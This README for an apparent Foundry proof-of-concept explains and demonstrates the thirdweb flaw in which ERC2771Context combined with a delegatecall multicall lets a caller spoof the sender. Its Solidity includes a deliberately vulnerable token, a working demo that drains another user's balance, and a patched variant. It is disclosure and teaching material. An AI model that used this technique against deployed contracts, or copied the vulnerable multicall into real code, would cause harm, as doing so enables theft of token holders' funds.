Foundry POC that shows how the thirdweb contracts were exploitable because of the incorrect combination of OpenZeppelin's ERC2771Context with Multicall.
The repository's main contracts are:
- Forwarder.sol - Mimics a relayer: the attacker calls a function on it and it forwards the call to the ERC20 token, appending the supplied sender address to the calldata as ERC-2771 specifies.
- ThirdWebErc20.sol - A simplified token that has the vulnerable multicall function and inherits from OpenZeppelin's ERC2771Context; the combination of the two is what makes the token vulnerable.
Say two users, cats and nirlin, have each been minted 100 tokens.
Now cats goes rogue and puts on a black hat. cats crafts a multicall whose inner transfer calls each have nirlin's address appended as the last 20 bytes of calldata. Because multicall delegatecalls each inner call, msg.sender is still the trusted forwarder, so ERC2771Context's _msgSender() reads the appended address and treats nirlin as the sender. Every inner call passes the token's validation and transfers nirlin's tokens to cats without any approval.
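The mechanism above, as an added self-contained example (not the repository's Forwarder.sol or ThirdWebErc20.sol). It inlines a minimal ERC2771Context and Multicall instead of importing OpenZeppelin, assumes a forwarder that relays without any signature check (enough to show the calldata trick), uses made-up addresses for cats and nirlin, and places a hardened token next to the vulnerable one that re-appends the outer call's sender suffix to every inner delegatecall:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Stand-in for the relayer. Assumption: no signature check, it simply relays
// `data` to `target` with the claimed signer appended, as ERC-2771 requires.
contract Forwarder {
    function forward(address target, bytes calldata data, address from)
        external
        returns (bytes memory)
    {
        (bool ok, bytes memory ret) = target.call(abi.encodePacked(data, from));
        require(ok, "forward failed");
        return ret;
    }
}

// Minimal ERC2771Context: when the caller is the trusted forwarder, the real
// sender is taken from the last 20 bytes of calldata.
abstract contract ERC2771Context {
    address private immutable _trustedForwarder;

    constructor(address forwarder) {
        _trustedForwarder = forwarder;
    }

    function isTrustedForwarder(address f) public view returns (bool) {
        return f == _trustedForwarder;
    }

    function _msgSender() internal view virtual returns (address sender) {
        if (isTrustedForwarder(msg.sender) && msg.data.length >= 20) {
            assembly {
                sender := shr(96, calldataload(sub(calldatasize(), 20)))
            }
        } else {
            sender = msg.sender;
        }
    }
}

// Simplified token with the vulnerable multicall.
contract VulnerableToken is ERC2771Context {
    mapping(address => uint256) public balanceOf;

    constructor(address forwarder) ERC2771Context(forwarder) {}

    function mint(address to, uint256 amount) external {
        balanceOf[to] += amount;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        address from = _msgSender();
        require(balanceOf[from] >= amount, "insufficient balance");
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }

    // BUG: delegatecall keeps msg.sender == forwarder, while the calldata seen
    // by the inner call is data[i], whose last 20 bytes the attacker chose.
    function multicall(bytes[] calldata data) external virtual returns (bytes[] memory results) {
        results = new bytes[](data.length);
        for (uint256 i = 0; i < data.length; i++) {
            (bool ok, bytes memory ret) = address(this).delegatecall(data[i]);
            require(ok, "inner call failed");
            results[i] = ret;
        }
    }
}

// Hardened variant: re-append the OUTER call's sender suffix to every inner
// call, so the inner _msgSender() can only resolve to the relayed signer.
contract FixedToken is VulnerableToken {
    constructor(address forwarder) VulnerableToken(forwarder) {}

    function multicall(bytes[] calldata data) external override returns (bytes[] memory results) {
        bytes memory context = msg.sender == _msgSender()
            ? new bytes(0)
            : msg.data[msg.data.length - 20:];
        results = new bytes[](data.length);
        for (uint256 i = 0; i < data.length; i++) {
            (bool ok, bytes memory ret) = address(this).delegatecall(bytes.concat(data[i], context));
            require(ok, "inner call failed");
            results[i] = ret;
        }
    }
}

// Drives the attack against either token. Addresses are made up for the demo.
contract Demo {
    address constant CATS = address(0xCA75);
    address constant NIRLIN = address(0x1141);

    function run(bool useFixed) external returns (uint256 catsBal, uint256 nirlinBal) {
        Forwarder fwd = new Forwarder();
        VulnerableToken tok = useFixed
            ? VulnerableToken(address(new FixedToken(address(fwd))))
            : new VulnerableToken(address(fwd));
        tok.mint(CATS, 100);
        tok.mint(NIRLIN, 100);

        // Inner call: transfer(CATS, 100) with NIRLIN's address glued on the end.
        bytes[] memory inner = new bytes[](1);
        inner[0] = abi.encodePacked(abi.encodeCall(tok.transfer, (CATS, 100)), NIRLIN);

        // cats relays multicall(inner) through the forwarder as cats.
        fwd.forward(address(tok), abi.encodeCall(tok.multicall, (inner)), CATS);

        return (tok.balanceOf(CATS), tok.balanceOf(NIRLIN));
    }
}
```

Against VulnerableToken the inner transfer is charged to nirlin (the 20 bytes cats appended), so nirlin's balance moves to cats with no approval; against FixedToken the suffix the forwarder appended for the outer call is copied onto the inner call, so the transfer is charged to cats and the balances are unchanged. A forge test that calls `Demo.run(false)` and `Demo.run(true)` and compares the two return values reproduces the POC's testMaliciousTransfer in one place.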
You can read more about the details of how this works in the following breakdowns:
$ forge build
$ forge test --match-test testMaliciousTransfer -vv